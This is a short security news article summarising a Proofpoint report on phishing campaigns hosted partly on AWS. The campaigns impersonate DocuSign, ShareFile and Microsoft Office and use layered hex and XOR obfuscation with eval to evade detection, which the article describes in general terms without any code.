Assets used as part of phishing campaigns are being hosted on AWS, with heavy XOR obfuscation to limit detection, according to a Proofpoint report.
A phishing campaign impersonating electronic signature service DocuSign, file service ShareFile, and Microsoft Office, hosted partially on Amazon Web Services (AWS), was discovered by Proofpoint, according to a blog post published by the company on Thursday.
While consumer-targeted storage services such as Google Drive and Dropbox have been used frequently in the past by threat actors, the use of public cloud services such as AWS and Microsoft Azure are “relatively uncommon,” Proofpoint noted. For non-AWS components of the campaign, domains were registered mostly through Russian domain registration services, with encryption certificates provided by Let’s Encrypt.
SEE: Special feature: Managing the multicloud (free PDF) (TechRepublic)
These phishing campaigns make extensive use of obfuscation to evade detection, with Proofpoint noting that “Amazon itself appears to be responsive and especially vigilant in taking down abusive accounts hosting this type of material,” adding that IT security professionals “should be aware of potentially malicious content on webpages hosted on AWS S3 cloud storage.”
The landing pages observed use arrays of hex-encoded strings, which according to Proofpoint, “when decoded, appears to include some ciphertext as well as a few strings, and then an eval statement to decode the encoded blob.” Encoding and variable names have been observed to change across deployments, further frustrating attempts at programmatic detection of phishing kits.
The report provides visualizations of the various layers of obfuscation employed by the phishers.
Use of public cloud platforms for phishing campaigns is not precisely new, though it is an increasingly attractive option—the benefits cloud computing offers the enterprise are equally as applicable to cybercriminals. In December 2018, a Menlo Security report indicated that attackers were using Google Cloud Platform for phishing campaigns, while a January 2019 report from Netskope found that Google App Engine was used for a malware campaign.
For more on security, check out “Businesses need to patch for BlueKeep to avoid another WannaCry” and “SanDisk’s SSD Dashboard uses hardcoded password, lacks encrypted updates” on TechRepublic.